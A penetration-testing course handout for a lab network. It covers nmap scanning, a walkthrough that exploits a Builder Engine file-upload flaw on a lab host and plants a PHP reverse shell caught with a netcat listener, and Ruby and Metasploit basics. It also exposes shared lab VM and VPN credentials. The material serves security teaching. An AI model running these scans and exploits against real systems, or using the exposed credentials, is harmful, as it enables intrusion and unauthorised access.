# Class Virtual Machine #

Here is the VMWare virtual machine for the class:

https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip

user:      infosecaddicts

pass:      infosecaddicts

Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.

If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.

https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf

Be sure to use 54.245.178.32/?src=connect for the VPN IP address instead of the one shown in the file

vpn username: {first_initial.last_name}  example: j.mccray

vpn password: !@#$vpn4321VPN

If you wants some scanning tips you should take a look at the following document:

https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf

---------------------------Type This-----------------------------------

-----------------------------------------------------------------------

#######################

# Scanning Techniques #

#######################

---------------------------Type This-----------------------------------

sudo nmap -sL 172.31.2.0/24

./ipcrawl 172.31.2.1 172.31.2.254

propecia 172.31.2 22

propecia 172.31.2 80

propecia 172.31.2 443

propecia 172.31.2 3389

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}'

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

cat ~/labnet-ip-list.txt

-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz

sudo cp http-screenshot.nse /usr/local/share/nmap/scripts/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 172.31.2.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt

-----------------------------------------------------------------------

---------------------------Type This----------------------------------- 

nano screenshots.sh

---------------------Paste this into the file--------------------------

----------------------------------------------------------------------- 

---------------------------Type This----------------------------------- 

python -m SimpleHTTPServer

----------------------------------------------------------------------- 

--- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html):

http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html

---------------------------Type This-----------------------------------

sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.0/24

sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 172.31.2.0/24

sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 172.31.2.0/24

sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.0/24

sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 172.31.2.0/24

sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.2.0/24

sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 172.31.2.0/24

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 172.31.2.0/24

sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.2.0/24

sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 172.31.2.0/24

sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 172.31.2.0/24

sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 172.31.2.0/24

sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 172.31.2.0/24

-----------------------------------------------------------------------

##################

# Day 1 Homework #

##################

Take screenshots of you performing all of the tasks above.

In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m).

Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day1-Homework.docx)

IMPORTANT NOTE:

Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday.

----------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------

- Host Discovery -

	- ping sweep

	- tcp ping

	- zone transfer

- Service Discovery -

	- nmap -sS <IP-RANGE>

- Service Version Discovery - 

	- nmap -sV <IP-RANGE>

- Vulnerability Research

	- exploit-db.com

--------------didn't find anything exploitable---------------------------------

- Deep enumeration

	- Linux (SUNRPC/NFS)

	- Win (SMB)

- Enumerate the webserver ports

	- Vulnerability Scan (Nikto)

	- Directory Bruteforce (dirb)

	- Analyze source code of each page

- Bruteforce ALL services

##################

# Attacking Sedna #

Attack steps:

-------------

Step 1: Ping sweep the target network

---------------------------Type This-----------------------------------

nmap -sP 172.31.2.0/24

-----------------------------------------------------------------------

Step 2: Port scan/Bannergrab the target host

---------------------------Type This-----------------------------------

sudo nmap -sV 172.31.2.86

-----------------------------------------------------------------------

PORT     STATE    SERVICE     VERSION

22/tcp   open     ssh         (protocol 2.0)

53/tcp   open     domain      ISC BIND 9.9.5-3-Ubuntu

80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))

110/tcp  open     pop3        Dovecot pop3d

111/tcp  open     rpcbind     2-4 (RPC #100000)

139/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)

143/tcp  open     imap        Dovecot imapd

445/tcp  open     netbios-ssn Samba smbd 3.X (workgroup: SEDNA)

514/tcp  filtered shell

993/tcp  open     ssl/imap    Dovecot imapd

995/tcp  open     ssl/pop3    Dovecot pop3d

8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :

SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL

SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds

Step 3: Vulnerability scan the webserver ports

---------------------------Type This-----------------------------------

rm -rf nikto*

git clone https://github.com/sullo/nikto.git Nikto2

cd Nikto2/program

perl nikto.pl -h 172.31.2.86

perl nikto.pl -h 172.31.2.86:8080

-----------------------------------------------------------------------

Step 4: Perform directory bruteforce against the target host

---------------------------Type This-----------------------------------

wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

perl Webr00t.pl -h 172.31.2.86 -v

-----------------------------------------------------------------------

                  or with dirbuster (dirb)

---------------------------Type This-----------------------------------

git clone https://github.com/v0re/dirb.git

cd dirb/

./configure

make

dirb

./dirb http://172.31.2.86 wordlists/big.txt

-----------------------------------------------------------------------

### dirb output ###

==> DIRECTORY: http://172.31.2.86/blocks/

==> DIRECTORY: http://172.31.2.86/files/

==> DIRECTORY: http://172.31.2.86/modules/

==> DIRECTORY: http://172.31.2.86/system/

==> DIRECTORY: http://172.31.2.86/themes/

+ http://172.31.2.86/robots.txt (CODE:200|SIZE:36)

+ http://172.31.2.86/server-status (CODE:403|SIZE:291)

### dirb output ###

Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0

An exploit for this application can be found at:

https://www.exploit-db.com/exploits/40390/

-------------------save this a "BuilderEngine.html"-------------------

<html>

<body>

<form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"

enctype="multipart/form-data">

    <input type="file" name="files[]" />

    <input type="submit" value="send" />

</form>

</body>

</html>

-----------------------------------------------------------------------

Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.

Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.

On the other server run:

nc -lvp 1234

Then upload the pentestmonkey reverseshell to .86

============================================ Attacking another server because I need a reverse shell =========================================

---------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file--------------------------  

    return "Network Pentester Night School!"

---------------------------Type This-----------------------------------

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443

----------------------------------------------------------------------- 

---------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file--------------------------

    return "Network Pentester Night School!"

--------------------------Type This----------------------------------- 

udo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443

----------------------------------------------------------------------- 

- OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.

---------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file-------------------------- 

--------------------------Type This----------------------------------- 

sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------  

---------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file-------------------------- 

--------------------------Type This----------------------------------- 

sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------  

-----------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file-------------------------- 

--------------------------Type This----------------------------------- 

sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------  

---------------------------Type This----------------------------------- 

sudo nano /usr/share/nmap/scripts/intro-nse.nse

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap - 

---------------------------Type This-----------------------------------

sudo nano /usr/local/share/nmap/scripts/intro-nse.nse

---------------------Paste this into the file--------------------------

--------------------------Type This----------------------------------- 

sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------

    - or if you are on a newer version of nmap -

---------------------------Type This----------------------------------- 

sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443

-----------------------------------------------------------------------  

##################

# Day 2 Homework #

##################

Take screenshots of you performing all of the day 2 tasks above

Take screenshots of you performing all of the tasks above.

In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m).

Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day2-Homework.docx)

IMPORTANT NOTE:

Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday.

############################################################

# Section 1: Ruby Fundamentals and Metasploit Architecture #

############################################################

################################

# Chapter 1: Ruby Fundamentals #

################################

- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer

scientist and programmer from Japan. It is a cross-platform dynamic language.

- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby

on Rails is a framework that is written in Ruby.

- Ruby's file name extensions are .rb and .rbw.

- official website of this

- language: www.ruby-lang.org.

- interactive Shell called Ruby Shell

- Installing and Running IRB

- open up the interactive console and play around.

irb

- Math, Variables, Classes, Creating Objects and Inheritance

# following arithmetic operators:

- Addition operator (+) — 10 + 23

- Subtraction operator (-) — 1001 - 34

- Multiplication operator (*) — 5 * 5

- Division operator (/) — 12 / 2

# Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment

operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by

30. Again, 69 is assigned to y, and then y is incremented by 33.

x = 25

x + 30

y = 69

y+33

- Let's look at creating classes and creating objects.

- Here, the name of the class is infosecaddicts. An object has its properties and methods.

class Attack

attr_accessor :of, :sqli, :xss

- Now that we have created the classes let's create the objects

first_attack = Attack.new

first_attack.of = "stack"

first_attack.sqli = "blind"

first_attack.xss = "dom"

puts first_attack.of

puts first_attack.sqli

puts first_attack.xss

- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,

inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which

one object can access the properties/attributes of another object of a different class. Inheritance makes your

programming life easier by maximizing code reuse.

class Exploitframeworks

attr_accessor :scanners, :exploits, :shellcode, :postmodules

class Metasploit < Exploitframeworks

class Canvas < Exploitframeworks

class Coreimpact < Exploitframeworks

class Saint < Exploitframeworks

class Exploitpack < Exploitframeworks

- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method is used to perform an action and is generally called with an object.

- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,

it will print this string: "We are Learning how to PenTest"

- An object named 'bo' is created, which is used to call the method.

class Msfnl

def learning

puts "We are Learning how to PenTest"

- Now let's define an object for our Method

joe = Msfnl.new

joe.learning

- An argument is a value or variable that is passed to the function while calling it. In the following example, while

calling the puts() function, we are sending a string value to the function. This string value is used by the

function to perform some particular operations.

puts ("Pentesting")

- shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated

assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following

statements to understand the shortcuts.

g = 70

g = g+44

g += 33

- In the above statement, g is incremented by 33 and then the total value is assigned to g.

g *= 3

- In the above statement, g is multiplied with 3 and then assigned to g.

- Example

- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show

how to use the following comparison operators.

'Less than' operator (<): This operator is used to check whether a variable or constant is less than another

variable or constant. If it's less than the other, the 'less than' operator returns true.

'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable

or constant. If it's equal to the other, the 'equal to' operator returns true.

'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another

variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.

numberofports = 55

puts "number of ports found during scan" if numberofports < 300

numberofports = 400

puts "number of ports found during scan" if numberofports < 300

puts "number of ports found during scan" if numberofports == 300

puts "number of ports found during scan" if numberofports != 300

Example

- the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.

- This operator is generally used to combine multiple conditions.

- In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the

- following example to understand how this operator works.

ports = 100

puts "number of ports found on the network" if ports<100 || ports>200

puts "number of ports found on the network" if ports<100 || ports>75

# unless

portsbelow1024 = 50

puts "If the ports are below 1024" unless portsbelow1024 < 1000

puts "If the ports are below 1024" unless portsbelow1024 < 1055

puts "If the ports are below 1024" unless portsbelow1024 < 20

- The 'unless' keyword is used to do something programmatically unless a condition is true.

- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.

- See the following example to understand how a string is printed 10 times on the screen using a loop.

10.times do puts "infosecaddicts" end

# Or use the curly braces

10.times {puts "infosecaddicts"}

- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while

working with different data types. Data type conversion is also known as type casting.

- In the following example, a and b are integers. So when a is divided by b, an integer division is performed. As a

result, 23/25 becomes 0.

- On the other hand, the integer variables c and d are converted to float. So the division gives the result in decimal

points.

24/4

14.0/5.0

a = 23

b = 25

print a/b

c = 26

d = 33

print c.to_f/d.to_f

- Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you

change the value of a constant, you will see a warning message.

- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string variable lets you assign the value to the string variable through multiple lines.

infosecaddicts = <<mark

welcome

to the

best

metasploit

course

on the

market

mark

puts infosecaddicts

- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that

it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.

Examine the following example to understand how interpolation works in Ruby.

a = 4

b = 6

puts "a * b = a*b"

puts " #{a} * #{b} = #{a*b} "

person = "Joe McCray"

puts "IT Security consultant person"

puts "IT Security consultant #{person}"

- Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.

- Regular expression is a powerful technique for text searching and text manipulation. Ruby provides built-in support

for regular expressions through the Regexp class. So the regular expressions in Ruby are the objects of Regexp type.

- In regular expressions, we define patterns to perform text search and advanced text manipulations. String literals

and metacharacters constitute a pattern. // characters mark the beginning and end of a pattern in Ruby.

The following example shows how the substring "today"

is placed in the main string.

a = "Woot Woot, we are learning regular expressions!!"

puts a.sub(/^..../, 'Today')

puts a.sub(/^..../, 'Today')

- Let's Loop the expressions. This example shows how to loop the expressions.

a.scan(/...../) {|w| puts w}

a.scan(/\S\S/) {|w| puts w}

- Character classes

infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"

"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}

"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}

- Arrays, Push and Pop, and Hashes

- In the following example, numbers is an array that holds 6 integer numbers.

numbers = [2,4,6,8,10,100]

puts numbers[0]

puts numbers[4]

numbers[2] = 150

puts numbers

- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.

framework = []

framework << "modules"

framework << "exploits"

framework << "payloads"

framework.pop

- Hash is a collection of elements, which is like the associative array in other languages. Each element has a key

that is used to access the element.

- Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.

In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the

respective values: 'what module should you use', 'Windows XP' and 'SSH'.

metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}

print metasploit.size

print metasploit["microsoft"]

metasploit['microsoft'] = 'redhat'

print metasploit['microsoft']

- Writing Ruby Scripts

- Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what

this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that

someone made to look for a specific port. The port that it is looking for is port 21 FTP.

cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan

ls